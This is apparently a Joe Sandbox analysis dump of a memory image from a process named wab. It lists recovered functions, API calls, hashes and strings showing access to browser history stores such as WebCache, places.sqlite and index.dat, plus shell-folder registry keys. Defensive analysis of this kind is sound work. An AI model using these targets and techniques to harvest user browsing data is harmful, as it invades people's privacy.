                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                  • String ID: "%s"
                  • API String ID: 1343145685-3297466227
                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProcProcessTimes
                  • String ID: GetProcessTimes$kernel32.dll
                  • API String ID: 1714573020-3385500049
                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                  APIs
                  • memset.MSVCRT ref: 004087D6
                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                  • memset.MSVCRT ref: 00408828
                  • memset.MSVCRT ref: 00408840
                  • memset.MSVCRT ref: 00408858
                  • memset.MSVCRT ref: 00408870
                  • memset.MSVCRT ref: 00408888
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                  • String ID:
                  • API String ID: 2911713577-0
                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmp
                  • String ID: @ $SQLite format 3
                  • API String ID: 1475443563-3708268960
                  • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                  • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                  APIs
                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                  • memset.MSVCRT ref: 00414C87
                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                  • wcscpy.MSVCRT ref: 00414CFC
                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressCloseProcVersionmemsetwcscpy
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  • API String ID: 2705122986-2036018995
                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmpqsort
                  • String ID: /nosort$/sort
                  • API String ID: 1579243037-1578091866
                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                  APIs
                  • memset.MSVCRT ref: 0040E60F
                  • memset.MSVCRT ref: 0040E629
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  Strings
                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                  • API String ID: 3354267031-2114579845
                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                  APIs
                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                  • LockResource.KERNEL32(00000000), ref: 004148EF
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Resource$FindLoadLockSizeof
                  • String ID:
                  • API String ID: 3473537107-0
                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                  APIs
                  Strings
                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: only a single result allowed for a SELECT that is part of an expression
                  • API String ID: 2221118986-1725073988
                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                  APIs
                  • Sleep.KERNEL32(00000064), ref: 004175D0
                  • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ChangeCloseFindNotificationSleep
                  • String ID: }A
                  • API String ID: 1821831730-2138825249
                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@DeleteObject
                  • String ID: r!A
                  • API String ID: 1103273653-628097481
                  • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                  • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@
                  • String ID:
                  • API String ID: 1033339047-0
                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                  APIs
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                  • memcmp.MSVCRT ref: 00444BA5
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$memcmp
                  • String ID: $$8
                  • API String ID: 2808797137-435121686
                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                  Strings
                  • too many columns on %s, xrefs: 00430763
                  • duplicate column name: %s, xrefs: 004307FE
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: duplicate column name: %s$too many columns on %s
                  • API String ID: 0-1445880494
                  • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                  • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                  • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                  • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                  APIs
                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                    • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                  • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                    • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                    • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                  • String ID:
                  • API String ID: 1042154641-0
                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                  APIs
                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                  • memset.MSVCRT ref: 00403A55
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                  • String ID: history.dat$places.sqlite
                  • API String ID: 3093078384-467022611
                  • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                  • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                  APIs
                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                  • GetLastError.KERNEL32 ref: 00417627
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ErrorLast$File$PointerRead
                  • String ID:
                  • API String ID: 839530781-0
                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileFindFirst
                  • String ID: *.*$index.dat
                  • API String ID: 1974802433-2863569691
                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@mallocmemcpy
                  • String ID:
                  • API String ID: 3831604043-0
                  • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                  • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                  APIs
                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                  • GetLastError.KERNEL32 ref: 004175A2
                  • GetLastError.KERNEL32 ref: 004175A8
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ErrorLast$FilePointer
                  • String ID:
                  • API String ID: 1156039329-0
                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$ChangeCloseCreateFindNotificationTime
                  • String ID:
                  • API String ID: 1631957507-0
                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                  APIs
                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Temp$DirectoryFileNamePathWindows
                  • String ID:
                  • API String ID: 1125800050-0
                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: d
                  • API String ID: 0-2564639436
                  • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                  • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: BINARY
                  • API String ID: 2221118986-907554435
                  • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                  • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                  APIs
                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                  • String ID:
                  • API String ID: 1161345128-0
                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
